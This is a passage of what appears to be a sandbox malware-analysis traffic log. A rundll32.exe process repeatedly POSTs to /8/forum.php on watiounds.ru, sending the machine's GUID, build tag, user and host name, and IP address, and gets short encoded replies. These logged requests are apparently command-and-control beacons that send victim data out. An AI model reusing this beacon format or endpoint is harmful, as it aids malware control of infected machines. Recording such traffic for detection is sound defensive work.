                                          Apr 29, 2021 08:22:16.643929958 CEST | 165 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:16.781843901 CEST | 165 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:16 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZBYAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          117 | 192.168.2.22 | 49282 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:17.100992918 CEST | 166 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:17.227116108 CEST | 166 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 54 47 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHTGSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          118 | 192.168.2.22 | 49283 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:17.550564051 CEST | 167 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:17.675575972 CEST | 167 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 56 45 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGVETARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          119 | 192.168.2.22 | 49284 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:17.991719007 CEST | 168 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:18.118484974 CEST | 169 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMGTNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          12 | 192.168.2.22 | 49177 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:19:17.758652925 CEST | 34 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:19:17.883658886 CEST | 34 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:19:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 56 45 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBVEYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          120 | 192.168.2.22 | 49285 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:18.440169096 CEST | 169 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:18.564140081 CEST | 170 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 48 53 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZHSAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          121 | 192.168.2.22 | 49286 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:18.870163918 CEST | 170 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:18.998110056 CEST | 171 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 56 45 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNVEMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          122 | 192.168.2.22 | 49287 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:19.318085909 CEST | 172 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:19.447474003 CEST | 172 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 54 47 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCTGXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          123 | 192.168.2.22 | 49288 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:19.766874075 CEST | 173 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:19.889653921 CEST | 173 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 42 59 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYBYBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          124 | 192.168.2.22 | 49289 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:20.200561047 CEST | 174 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:20.324296951 CEST | 174 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:20 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 4a 51 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHJQSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          125 | 192.168.2.22 | 49290 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:20.634546041 CEST | 175 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:20.757410049 CEST | 175 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:20 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVZAEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          126 | 192.168.2.22 | 49291 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:21.067374945 CEST | 176 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:21.189064026 CEST | 176 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          127 | 192.168.2.22 | 49292 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:21.518301010 CEST | 177 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:21.648972988 CEST | 177 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTHSGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          128 | 192.168.2.22 | 49293 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:21.966917038 CEST | 178 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:22.090084076 CEST | 179 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 41 5a 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFAZUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          129 | 192.168.2.22 | 49294 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:22.411878109 CEST | 179 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:22.556219101 CEST | 180 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4e 4d 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCNMXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          13 | 192.168.2.22 | 49178 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:19:32.044964075 CEST | 37 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:19:32.173738003 CEST | 37 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:19:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 43 58 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNCXMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          130 | 192.168.2.22 | 49295 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:22.872348070 CEST | 180 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:22.997508049 CEST | 181 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVZAEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          131 | 192.168.2.22 | 49296 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
